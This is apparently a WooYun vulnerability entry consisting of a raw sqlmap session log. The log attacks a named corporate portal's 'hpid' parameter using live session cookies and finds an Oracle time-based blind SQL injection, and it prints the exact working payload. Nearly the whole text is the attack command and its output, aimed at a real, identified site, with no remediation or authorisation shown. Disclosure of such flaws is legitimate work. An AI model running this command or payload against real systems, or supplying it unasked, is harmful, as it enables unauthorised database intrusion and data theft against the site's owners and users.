WooYun.org

C:\Python27\sqlmap>sqlmap.py -u "http://eip.crcchem.com/homepage/Homepage.jsp?hp
id=61&subCompanyId=21&isfromportal=1&isfromhp=0" -p "hpid" --cookie "testBanCook
ie=test; JSESSIONID=abcmHSSRt405C4B6i8h7u; loginfileweaver=%2Fwui%2Ftheme%2Fecol
ogy7%2Fpage%2Flogin.jsp%3FtemplateId%3D21%26logintype%3D1%26gopage%3D; loginidwe
aver=1357; languageidweaver=7"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150609}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:21:46
[09:21:47] [INFO] testing connection to the target URL
[09:21:49] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[09:21:51] [INFO] target URL is stable
[09:21:51] [WARNING] heuristic (basic) test shows that GET parameter 'hpid' migh
t not be injectable
[09:21:52] [INFO] heuristic (XSS) test shows that GET parameter 'hpid' might be
vulnerable to XSS attacks
[09:21:52] [INFO] testing for SQL injection on GET parameter 'hpid'
[09:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:21:53] [WARNING] reflective value(s) found and filtering out
[09:22:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[09:22:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[09:22:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:22:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[09:22:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[09:22:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[09:22:28] [INFO] testing 'MySQL inline queries'
[09:22:29] [INFO] testing 'PostgreSQL inline queries'
[09:22:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:22:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[09:22:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:22:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[09:22:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[09:22:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[09:22:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:22:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:23:04] [INFO] testing 'Oracle AND time-based blind'
[09:24:05] [INFO] GET parameter 'hpid' seems to be 'Oracle AND time-based blind'
 injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads s
pecific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'Oracle' extending
 provided level (1) and risk (1) values? [Y/n]
[09:24:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:24:10] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:24:29] [INFO] checking if the injection point on GET parameter 'hpid' is a f
alse positive
[09:24:59] [WARNING] there is a possibility that the target (or WAF) is dropping
 'suspicious' requests
GET parameter 'hpid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 115 HTTP(s) req
uests:
---
Parameter: hpid (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: hpid=61 AND 1918=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(121)||CHR(
117)||CHR(122),5)&subCompanyId=21&isfromportal=1&isfromhp=0
---
[09:26:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle